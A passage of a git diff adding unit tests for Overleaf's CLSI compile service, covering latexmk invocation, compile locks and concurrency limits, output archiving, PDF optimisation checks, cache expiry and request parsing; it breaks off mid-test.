this.CommandRunner.run.should.have.been.calledWith( + this.project_id, + [ + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode', + '-f', + '-pdf', + '$COMPILE_DIR/main-file.tex', + ], + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup + ) + }) + + it('should record the stdout and stderr', function () { + this.fs.writeFile.should.have.been.calledWith( + this.directory + '/' + 'output.stdout', + 'this is stdout', + { flag: 'wx' } + ) + this.fs.writeFile.should.have.been.calledWith( + this.directory + '/' + 'output.stderr', + 'this is stderr', + { flag: 'wx' } + ) + this.fs.unlink.should.have.been.calledWith( + this.directory + '/' + 'output.stdout' + ) + this.fs.unlink.should.have.been.calledWith( + this.directory + '/' + 'output.stderr' + ) + }) + + it('should not record cpu metrics', function () { + expect(this.timings['cpu-percent']).to.not.exist + expect(this.timings['cpu-time']).to.not.exist + expect(this.timings['sys-time']).to.not.exist + }) + }) + + describe('with a different compiler', function () { + beforeEach(function (done) { + this.compiler = 'lualatex' + this.call(done) + }) + + it('should set the appropriate latexmk flag', function () { + this.CommandRunner.run.should.have.been.calledWith(this.project_id, [ + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode', + '-f', + '-lualatex', + '$COMPILE_DIR/main-file.tex', + ]) + }) + }) + + describe('with time -v', function () { + beforeEach(function (done) { + this.commandRunnerOutput.stderr = + '\tCommand being timed: "sh -c timeout 1 yes > /dev/null"\n' + + '\tUser time (seconds): 0.28\n' + + '\tSystem time (seconds): 0.70\n' + + '\tPercent of CPU this job got: 98%\n' + this.call(done) + }) + + it('should record cpu metrics', function () { + expect(this.timings['cpu-percent']).to.equal(98) + expect(this.timings['cpu-time']).to.equal(0.28) + expect(this.timings['sys-time']).to.equal(0.7) + }) + }) + + describe('with an .Rtex main file', function () { + beforeEach(function (done) { + this.mainFile = 'main-file.Rtex' + this.call(done) + }) + + it('should run the latex command on the equivalent .tex file', function () { + const command = this.CommandRunner.run.args[0][1] + const mainFile = 
command.slice(-1)[0] + mainFile.should.equal('$COMPILE_DIR/main-file.tex') + }) + }) + + describe('with a flags option', function () { + beforeEach(function (done) { + this.flags = ['-shell-restricted', '-halt-on-error'] + this.call(done) + }) + + it('should include the flags in the command', function () { + const command = this.CommandRunner.run.args[0][1] + const flags = command.filter( + arg => arg === '-shell-restricted' || arg === '-halt-on-error' + ) + flags.length.should.equal(2) + flags[0].should.equal('-shell-restricted') + flags[1].should.equal('-halt-on-error') + }) + }) + + describe('with the stopOnFirstError option', function () { + beforeEach(function (done) { + this.stopOnFirstError = true + this.call(done) + }) + + it('should set the appropriate flags', function () { + this.CommandRunner.run.should.have.been.calledWith(this.project_id, [ + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode', + '-halt-on-error', + '-pdf', + '$COMPILE_DIR/main-file.tex', + ]) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/LockManagerTests.js b/services/clsi/test/unit/js/LockManagerTests.js new file mode 100644 index 0000000..7005b3e --- /dev/null +++ b/services/clsi/test/unit/js/LockManagerTests.js @@ -0,0 +1,116 @@ +const { expect } = require('chai') +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/LockManager' +) +const Errors = require('../../../app/js/Errors') + +describe('LockManager', function () { + beforeEach(function () { + this.key = '/local/compile/directory' + this.clock = sinon.useFakeTimers() + this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/metrics': (this.Metrics = { + inc: sinon.stub(), + gauge: sinon.stub(), + }), + '@overleaf/settings': (this.Settings = { + compileConcurrencyLimit: 5, + }), + './Errors': (this.Erros = Errors), + './RequestParser': { MAX_TIMEOUT: 600 }, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('when the lock is available', function () { + it('the lock can be acquired', function () { + const lock = this.LockManager.acquire(this.key) + expect(lock).to.exist + lock.release() + }) + }) + + describe('after the lock is acquired', function () { + beforeEach(function () { + this.lock = this.LockManager.acquire(this.key) + }) + + afterEach(function () { + if (this.lock != null) { + this.lock.release() + } + }) + + it("the lock can't be acquired again", function () { + expect(() => this.LockManager.acquire(this.key)).to.throw( + Errors.AlreadyCompilingError + ) + }) + + it('another lock can be acquired', function () { + const lock = this.LockManager.acquire('another key') + expect(lock).to.exist + lock.release() + }) + + it('the lock can be acquired again after an expiry period', function () { + // The expiry time is a little bit over 10 minutes. Let's wait 15 minutes. 
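+      // (Assumption: the expiry appears to derive from the stubbed RequestParser MAX_TIMEOUT of 600s plus a margin, hence "a little bit over 10 minutes"; advancing sinon's fake clock by 15 minutes comfortably exceeds it.)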
+ this.clock.tick(15 * 60 * 1000) + this.lock = this.LockManager.acquire(this.key) + expect(this.lock).to.exist + }) + + it('the lock can be acquired again after it was released', function () { + this.lock.release() + this.lock = this.LockManager.acquire(this.key) + expect(this.lock).to.exist + }) + }) + + describe('concurrency limit', function () { + it('exceeding the limit', function () { + for (let i = 0; i <= this.Settings.compileConcurrencyLimit; i++) { + this.LockManager.acquire('test_key' + i) + } + this.Metrics.inc + .calledWith('exceeded-compilier-concurrency-limit') + .should.equal(false) + expect(() => + this.LockManager.acquire( + 'test_key_' + (this.Settings.compileConcurrencyLimit + 1), + false + ) + ).to.throw(Errors.TooManyCompileRequestsError) + + this.Metrics.inc + .calledWith('exceeded-compilier-concurrency-limit') + .should.equal(true) + }) + + it('within the limit', function () { + for (let i = 0; i <= this.Settings.compileConcurrencyLimit - 1; i++) { + this.LockManager.acquire('test_key' + i) + } + this.Metrics.inc + .calledWith('exceeded-compilier-concurrency-limit') + .should.equal(false) + + const lock = this.LockManager.acquire( + 'test_key_' + this.Settings.compileConcurrencyLimit, + false + ) + + expect(lock.key).to.equal( + 'test_key_' + this.Settings.compileConcurrencyLimit + ) + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputControllerTests.js b/services/clsi/test/unit/js/OutputControllerTests.js new file mode 100644 index 0000000..ee5c9c2 --- /dev/null +++ b/services/clsi/test/unit/js/OutputControllerTests.js @@ -0,0 +1,105 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/OutputController' +) + +describe('OutputController', function () { + describe('createOutputZip', function () { + beforeEach(function () { + this.archive = {} + + this.pipeline = sinon.stub().resolves() + + this.archiveFilesForBuild = sinon.stub().resolves(this.archive) + + this.OutputController = SandboxedModule.require(MODULE_PATH, { + requires: { + './OutputFileArchiveManager': { + archiveFilesForBuild: this.archiveFilesForBuild, + }, + 'stream/promises': { + pipeline: this.pipeline, + }, + }, + }) + }) + + describe('when OutputFileArchiveManager creates an archive', function () { + beforeEach(function (done) { + this.res = { + attachment: sinon.stub(), + setHeader: sinon.stub(), + } + this.req = { + params: { + project_id: 'project-id-123', + user_id: 'user-id-123', + build_id: 'build-id-123', + }, + query: { + files: ['output.tex'], + }, + } + this.pipeline.callsFake(() => { + done() + return Promise.resolve() + }) + this.OutputController.createOutputZip(this.req, this.res) + }) + + it('creates a pipeline from the archive to the response', function () { + sinon.assert.calledWith(this.pipeline, this.archive, this.res) + }) + + it('calls the express convenience method to set attachment headers', function () { + sinon.assert.calledWith(this.res.attachment, 'output.zip') + }) + + it('sets the X-Content-Type-Options header to nosniff', function () { + sinon.assert.calledWith( + this.res.setHeader, + 'X-Content-Type-Options', + 'nosniff' + ) + }) + }) + + describe('when OutputFileArchiveManager throws an error', function () { + let error + + beforeEach(function (done) { + error = new Error('error message') + + this.archiveFilesForBuild.rejects(error) + + this.res = { + status: sinon.stub().returnsThis(), + send: sinon.stub(), + } + this.req = { + params: { + 
project_id: 'project-id-123', + user_id: 'user-id-123', + build_id: 'build-id-123', + }, + query: { + files: ['output.tex'], + }, + } + this.OutputController.createOutputZip( + this.req, + this.res, + (this.next = sinon.stub().callsFake(() => { + done() + })) + ) + }) + + it('calls next with the error', function () { + sinon.assert.calledWith(this.next, error) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputFileArchiveManagerTests.js b/services/clsi/test/unit/js/OutputFileArchiveManagerTests.js new file mode 100644 index 0000000..d6817f3 --- /dev/null +++ b/services/clsi/test/unit/js/OutputFileArchiveManagerTests.js @@ -0,0 +1,229 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { assert, expect } = require('chai') + +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/OutputFileArchiveManager' +) + +describe('OutputFileArchiveManager', function () { + const userId = 'user-id-123' + const projectId = 'project-id-123' + const buildId = 'build-id-123' + + afterEach(function () { + sinon.restore() + }) + + beforeEach(function () { + this.OutputFileFinder = { + promises: { + findOutputFiles: sinon.stub().resolves({ outputFiles: [] }), + }, + } + + this.OutputCacheManger = { + path: sinon.stub().callsFake((build, path) => { + return `${build}/${path}` + }), + } + + this.archive = { + append: sinon.stub(), + finalize: sinon.stub().resolves(), + on: sinon.stub(), + } + + this.archiver = sinon.stub().returns(this.archive) + + this.outputDir = '/output/dir' + + this.fs = { + open: sinon.stub().callsFake(file => ({ + createReadStream: sinon.stub().returns(`handle: ${file}`), + })), + } + + this.OutputFileArchiveManager = SandboxedModule.require(MODULE_PATH, { + requires: { + './OutputFileFinder': this.OutputFileFinder, + './OutputCacheManager': this.OutputCacheManger, + archiver: this.archiver, + 'fs/promises': this.fs, + '@overleaf/settings': { + path: { + outputDir: this.outputDir, + }, + }, + }, + }) + }) + + describe('when the output cache directory contains only exportable files', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.resolves({ + outputFiles: [ + { path: 'file_1' }, + { path: 'file_2' }, + { path: 'file_3' }, + { path: 'file_4' }, + ], + }) + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + }) + + it('creates a zip archive', function () { + sinon.assert.calledWith(this.archiver, 'zip') + }) + + it('listens to errors from the archive', function () { + sinon.assert.calledWith(this.archive.on, 'error', sinon.match.func) + }) + + it('adds all the output files to the archive', function () { + expect(this.archive.append.callCount).to.equal(4) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_1`, + sinon.match({ name: 'file_1' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_2`, + sinon.match({ name: 'file_2' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_3`, + sinon.match({ name: 'file_3' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_4`, + sinon.match({ name: 'file_4' }) + ) + }) + + it('finalizes the archive after all files are appended', function () { + sinon.assert.called(this.archive.finalize) + 
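      // i.e. the first finalize() call must not precede the first append(); combined with the called-check above, this guards against finalising before any files are added. +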
expect(this.archive.finalize.calledBefore(this.archive.append)).to.be + .false + }) + }) + + describe('when the directory includes files ignored by web', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.resolves({ + outputFiles: [ + { path: 'file_1' }, + { path: 'file_2' }, + { path: 'file_3' }, + { path: 'file_4' }, + { path: 'output.pdf' }, + ], + }) + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + }) + + it('only includes the non-ignored files in the archive', function () { + expect(this.archive.append.callCount).to.equal(4) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_1`, + sinon.match({ name: 'file_1' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_2`, + sinon.match({ name: 'file_2' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_3`, + sinon.match({ name: 'file_3' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_4`, + sinon.match({ name: 'file_4' }) + ) + }) + }) + + describe('when one of the files is called output.pdf', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.resolves({ + outputFiles: [ + { path: 'file_1' }, + { path: 'file_2' }, + { path: 'file_3' }, + { path: 'file_4' }, + { path: 'output.pdf' }, + ], + }) + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + }) + + it('does not include that file in the archive', function () { + expect(this.archive.append.callCount).to.equal(4) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_1`, + sinon.match({ name: 'file_1' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_2`, + sinon.match({ name: 'file_2' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_3`, + sinon.match({ name: 'file_3' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_4`, + sinon.match({ name: 'file_4' }) + ) + }) + }) + + describe('when the output directory cannot be accessed', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.rejects({ + code: 'ENOENT', + }) + }) + + it('rejects with a NotFoundError', async function () { + try { + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + assert.fail('should have thrown a NotFoundError') + } catch (err) { + expect(err).to.haveOwnProperty('name', 'NotFoundError') + } + }) + + it('does not create an archive', function () { + expect(this.archiver.called).to.be.false + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputFileFinderTests.js b/services/clsi/test/unit/js/OutputFileFinderTests.js new file mode 100644 index 0000000..c9e1b44 --- /dev/null +++ b/services/clsi/test/unit/js/OutputFileFinderTests.js @@ -0,0 +1,72 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/OutputFileFinder' +) +const { expect } = require('chai') +const mockFs = 
require('mock-fs') + +describe('OutputFileFinder', function () { + beforeEach(function () { + this.OutputFileFinder = SandboxedModule.require(modulePath, {}) + this.directory = '/test/dir' + this.callback = sinon.stub() + + mockFs({ + [this.directory]: { + resource: { + 'path.tex': 'a source file', + }, + 'output.pdf': 'a generated pdf file', + extra: { + 'file.tex': 'a generated tex file', + }, + 'sneaky-file': mockFs.symlink({ + path: '../foo', + }), + }, + }) + }) + + afterEach(function () { + mockFs.restore() + }) + + describe('findOutputFiles', function () { + beforeEach(async function () { + this.resource_path = 'resource/path.tex' + this.output_paths = ['output.pdf', 'extra/file.tex'] + this.all_paths = this.output_paths.concat([this.resource_path]) + this.resources = [{ path: (this.resource_path = 'resource/path.tex') }] + const { outputFiles, allEntries } = + await this.OutputFileFinder.promises.findOutputFiles( + this.resources, + this.directory + ) + this.outputFiles = outputFiles + this.allEntries = allEntries + }) + + it('should only return the output files, not directories or resource paths', function () { + expect(this.outputFiles).to.have.deep.members([ + { + path: 'output.pdf', + type: 'pdf', + }, + { + path: 'extra/file.tex', + type: 'tex', + }, + ]) + expect(this.allEntries).to.deep.equal([ + 'extra/file.tex', + 'extra/', + 'output.pdf', + 'resource/path.tex', + 'resource/', + 'sneaky-file', + ]) + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputFileOptimiserTests.js b/services/clsi/test/unit/js/OutputFileOptimiserTests.js new file mode 100644 index 0000000..1dd1a75 --- /dev/null +++ b/services/clsi/test/unit/js/OutputFileOptimiserTests.js @@ -0,0 +1,192 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const SandboxedModule = require('sandboxed-module')
+const sinon = require('sinon')
+const modulePath = require('node:path').join(
+ __dirname,
+ '../../../app/js/OutputFileOptimiser'
+)
+const path = require('node:path')
+const { expect } = require('chai')
+const { EventEmitter } = require('node:events')
+
+describe('OutputFileOptimiser', function () {
+ beforeEach(function () {
+ this.OutputFileOptimiser = SandboxedModule.require(modulePath, {
+ requires: {
+ fs: (this.fs = {}),
+ path: (this.Path = {}),
+ child_process: { spawn: (this.spawn = sinon.stub()) },
+ './Metrics': {},
+ },
+ globals: { Math }, // used by lodash
+ })
+ this.directory = '/test/dir'
+ return (this.callback = sinon.stub())
+ })
+
+ describe('optimiseFile', function () {
+ beforeEach(function () {
+ this.src = './output.pdf'
+ return (this.dst = './output.pdf')
+ })
+
+ describe('when the file is not a pdf file', function () {
+ beforeEach(function (done) {
+ this.src = './output.log'
+ this.OutputFileOptimiser.checkIfPDFIsOptimised = sinon
+ .stub()
+ .callsArgWith(1, null, false)
+ this.OutputFileOptimiser.optimisePDF = sinon
+ .stub()
+ .callsArgWith(2, null)
+ return this.OutputFileOptimiser.optimiseFile(this.src, this.dst, done)
+ })
+
+ it('should not check if the file is optimised', function () {
+ return this.OutputFileOptimiser.checkIfPDFIsOptimised
+ .calledWith(this.src)
+ .should.equal(false)
+ })
+
+ return it('should not optimise the file', function () {
+ return this.OutputFileOptimiser.optimisePDF
+ .calledWith(this.src, this.dst)
+ .should.equal(false)
+ })
+ })
+
+ describe('when the pdf file is not optimised', function () {
+ beforeEach(function (done) {
+ this.OutputFileOptimiser.checkIfPDFIsOptimised = sinon
+ .stub()
+ .callsArgWith(1, null, false)
+ this.OutputFileOptimiser.optimisePDF = sinon
+ .stub()
+ .callsArgWith(2, null)
+ return this.OutputFileOptimiser.optimiseFile(this.src, this.dst, done)
+ })
+
+ it('should check if the pdf is optimised', function () {
+ return this.OutputFileOptimiser.checkIfPDFIsOptimised
+ .calledWith(this.src)
+ .should.equal(true)
+ })
+
+ return it('should optimise the pdf', function () {
+ return this.OutputFileOptimiser.optimisePDF
+ .calledWith(this.src, this.dst)
+ .should.equal(true)
+ })
+ })
+
+ return describe('when the pdf file is optimised', function () {
+ beforeEach(function (done) {
+ this.OutputFileOptimiser.checkIfPDFIsOptimised = sinon
+ .stub()
+ .callsArgWith(1, null, true)
+ this.OutputFileOptimiser.optimisePDF = sinon
+ .stub()
+ .callsArgWith(2, null)
+ return this.OutputFileOptimiser.optimiseFile(this.src, this.dst, done)
+ })
+
+ it('should check if the pdf is optimised', function () {
+ return this.OutputFileOptimiser.checkIfPDFIsOptimised
+ .calledWith(this.src)
+ .should.equal(true)
+ })
+
+ return it('should not optimise the pdf', function () {
+ return this.OutputFileOptimiser.optimisePDF
+ .calledWith(this.src, this.dst)
+ .should.equal(false)
+ })
+ })
+ })
+
+ return describe('checkIfPDFIsOptimised', function () {
+ beforeEach(function () {
+ this.callback = sinon.stub()
+ this.fd = 1234
+ this.fs.open = sinon.stub().yields(null, this.fd)
+ this.fs.read = sinon
+ .stub()
+ .withArgs(this.fd)
+ .yields(null, 100, Buffer.from('hello /Linearized 1'))
+ this.fs.close = sinon.stub().withArgs(this.fd).yields(null)
+ return
this.OutputFileOptimiser.checkIfPDFIsOptimised( + this.src, + this.callback + ) + }) + + describe('for a linearised file', function () { + beforeEach(function () { + this.fs.read = sinon + .stub() + .withArgs(this.fd) + .yields(null, 100, Buffer.from('hello /Linearized 1')) + return this.OutputFileOptimiser.checkIfPDFIsOptimised( + this.src, + this.callback + ) + }) + + it('should open the file', function () { + return this.fs.open.calledWith(this.src, 'r').should.equal(true) + }) + + it('should read the header', function () { + return this.fs.read.calledWith(this.fd).should.equal(true) + }) + + it('should close the file', function () { + return this.fs.close.calledWith(this.fd).should.equal(true) + }) + + return it('should call the callback with a true result', function () { + return this.callback.calledWith(null, true).should.equal(true) + }) + }) + + return describe('for an unlinearised file', function () { + beforeEach(function () { + this.fs.read = sinon + .stub() + .withArgs(this.fd) + .yields(null, 100, Buffer.from('hello not linearized 1')) + return this.OutputFileOptimiser.checkIfPDFIsOptimised( + this.src, + this.callback + ) + }) + + it('should open the file', function () { + return this.fs.open.calledWith(this.src, 'r').should.equal(true) + }) + + it('should read the header', function () { + return this.fs.read.calledWith(this.fd).should.equal(true) + }) + + it('should close the file', function () { + return this.fs.close.calledWith(this.fd).should.equal(true) + }) + + return it('should call the callback with a false result', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ProjectPersistenceManagerTests.js b/services/clsi/test/unit/js/ProjectPersistenceManagerTests.js new file mode 100644 index 0000000..4f42411 --- /dev/null +++ b/services/clsi/test/unit/js/ProjectPersistenceManagerTests.js @@ -0,0 +1,174 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const assert = require('chai').assert +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ProjectPersistenceManager' +) +const tk = require('timekeeper') + +describe('ProjectPersistenceManager', function () { + beforeEach(function () { + this.fsPromises = { + statfs: sinon.stub(), + } + + this.ProjectPersistenceManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/metrics': (this.Metrics = { gauge: sinon.stub() }), + './UrlCache': (this.UrlCache = {}), + './CompileManager': (this.CompileManager = {}), + fs: { promises: this.fsPromises }, + '@overleaf/settings': (this.settings = { + project_cache_length_ms: 1000, + path: { + compilesDir: '/compiles', + outputDir: '/output', + clsiCacheDir: '/cache', + }, + }), + }, + }) + this.callback = sinon.stub() + this.project_id = 'project-id-123' + return (this.user_id = '1234') + }) + + describe('refreshExpiryTimeout', function () { + it('should leave expiry alone if plenty of disk', function (done) { + this.fsPromises.statfs.resolves({ + blocks: 100, + bsize: 1, + bavail: 40, + }) + + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.Metrics.gauge.should.have.been.calledWith( + 'disk_available_percent', + 40 + ) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal( + this.settings.project_cache_length_ms + ) + done() + }) + }) + + it('should drop EXPIRY_TIMEOUT 10% if low disk usage', function (done) { + this.fsPromises.statfs.resolves({ + blocks: 100, + bsize: 1, + bavail: 5, + }) + + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.Metrics.gauge.should.have.been.calledWith( + 'disk_available_percent', + 5 + ) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal(900) + done() + }) + }) + + it('should not drop EXPIRY_TIMEOUT to below 50% of project_cache_length_ms', function (done) { + this.fsPromises.statfs.resolves({ + blocks: 100, + bsize: 1, + bavail: 5, + }) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT = 500 + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.Metrics.gauge.should.have.been.calledWith( + 'disk_available_percent', + 5 + ) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal(500) + done() + }) + }) + + it('should not modify EXPIRY_TIMEOUT if there is an error getting disk values', function (done) { + this.fsPromises.statfs.rejects(new Error()) + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal(1000) + done() + }) + }) + }) + + describe('clearExpiredProjects', function () { + beforeEach(function () { + this.project_ids = ['project-id-1', 'project-id-2'] + this.ProjectPersistenceManager._findExpiredProjectIds = sinon + .stub() + .callsArgWith(0, null, this.project_ids) + this.ProjectPersistenceManager.clearProjectFromCache = sinon + .stub() + .callsArg(2) + this.CompileManager.clearExpiredProjects = sinon.stub().callsArg(1) + return this.ProjectPersistenceManager.clearExpiredProjects(this.callback) + }) + + it('should clear each expired project', function () { + return Array.from(this.project_ids).map(projectId => + this.ProjectPersistenceManager.clearProjectFromCache + .calledWith(projectId) + 
.should.equal(true) + ) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('clearProject', function () { + beforeEach(function () { + this.ProjectPersistenceManager._clearProjectFromDatabase = sinon + .stub() + .callsArg(1) + this.UrlCache.clearProject = sinon.stub().callsArg(2) + this.CompileManager.clearProject = sinon.stub().callsArg(2) + return this.ProjectPersistenceManager.clearProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + it('should clear the project from the database', function () { + return this.ProjectPersistenceManager._clearProjectFromDatabase + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should clear all the cached Urls for the project', function () { + return this.UrlCache.clearProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should clear the project compile folder', function () { + return this.CompileManager.clearProject + .calledWith(this.project_id, this.user_id) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/RequestParserTests.js b/services/clsi/test/unit/js/RequestParserTests.js new file mode 100644 index 0000000..437c3c4 --- /dev/null +++ b/services/clsi/test/unit/js/RequestParserTests.js @@ -0,0 +1,480 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/RequestParser' +) +const tk = require('timekeeper') + +describe('RequestParser', function () { + beforeEach(function () { + tk.freeze() + this.callback = sinon.stub() + this.validResource = { + path: 'main.tex', + date: '12:00 01/02/03', + content: 'Hello world', + } + this.validRequest = { + compile: { + token: 'token-123', + options: { + imageName: 'basicImageName/here:2017-1', + compiler: 'pdflatex', + timeout: 42, + }, + resources: [], + }, + } + this.RequestParser = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = {}), + './OutputCacheManager': { BUILD_REGEX: /^[0-9a-f]+-[0-9a-f]+$/ }, + }, + }) + }) + + afterEach(function () { + tk.reset() + }) + + describe('without a top level object', function () { + beforeEach(function () { + this.RequestParser.parse([], this.callback) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.called + expect(this.callback.args[0][0].message).to.equal( + 'top level object should have a compile attribute' + ) + }) + }) + + describe('without a compile attribute', function () { + beforeEach(function () { + this.RequestParser.parse({}, this.callback) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.called + expect(this.callback.args[0][0].message).to.equal( + 'top level object should have a compile attribute' + ) + }) + }) + + describe('without a valid compiler', function () { + beforeEach(function () { + this.validRequest.compile.options.compiler = 'not-a-compiler' + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: + 'compiler attribute should be one of: pdflatex, latex, xelatex, lualatex', + }) + .should.equal(true) + }) + }) + + describe('without a compiler specified', function () { + beforeEach(function (done) { + 
+ delete this.validRequest.compile.options.compiler
+ this.RequestParser.parse(this.validRequest, (error, data) => {
+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should set the compiler to pdflatex by default', function () {
+ this.data.compiler.should.equal('pdflatex')
+ })
+ })
+
+ describe('with imageName set', function () {
+ beforeEach(function (done) {
+ this.RequestParser.parse(this.validRequest, (error, data) => {
+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should set the imageName', function () {
+ this.data.imageName.should.equal('basicImageName/here:2017-1')
+ })
+ })
+
+ describe('when image restrictions are present', function () {
+ beforeEach(function () {
+ this.settings.clsi = { docker: {} }
+ this.settings.clsi.docker.allowedImages = [
+ 'repo/name:tag1',
+ 'repo/name:tag2',
+ ]
+ })
+
+ describe('with imageName set to something invalid', function () {
+ beforeEach(function () {
+ const request = this.validRequest
+ request.compile.options.imageName = 'something/different:latest'
+ this.RequestParser.parse(request, (error, data) => {
+ this.error = error
+ this.data = data
+ })
+ })
+
+ it('should throw an error for imageName', function () {
+ expect(String(this.error)).to.include(
+ 'imageName attribute should be one of'
+ )
+ })
+ })
+
+ describe('with imageName set to something valid', function () {
+ beforeEach(function () {
+ const request = this.validRequest
+ request.compile.options.imageName = 'repo/name:tag1'
+ this.RequestParser.parse(request, (error, data) => {
+ this.error = error
+ this.data = data
+ })
+ })
+
+ it('should set the imageName', function () {
+ this.data.imageName.should.equal('repo/name:tag1')
+ })
+ })
+ })
+
+ describe('with flags set', function () {
+ beforeEach(function (done) {
+ this.validRequest.compile.options.flags = ['-file-line-error']
+ this.RequestParser.parse(this.validRequest, (error, data) => {
+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should set the flags attribute', function () {
+ expect(this.data.flags).to.deep.equal(['-file-line-error'])
+ })
+ })
+
+ describe('with flags not specified', function () {
+ beforeEach(function (done) {
+ this.RequestParser.parse(this.validRequest, (error, data) => {
+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should have an empty flags list', function () {
+ expect(this.data.flags).to.deep.equal([])
+ })
+ })
+
+ describe('without a timeout specified', function () {
+ beforeEach(function (done) {
+ delete this.validRequest.compile.options.timeout
+ this.RequestParser.parse(this.validRequest, (error, data) => {
+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should set the timeout to MAX_TIMEOUT', function () {
+ this.data.timeout.should.equal(this.RequestParser.MAX_TIMEOUT * 1000)
+ })
+ })
+
+ describe('with a timeout larger than the maximum', function () {
+ beforeEach(function (done) {
+ this.validRequest.compile.options.timeout =
+ this.RequestParser.MAX_TIMEOUT + 1
+ this.RequestParser.parse(this.validRequest, (error, data) => {
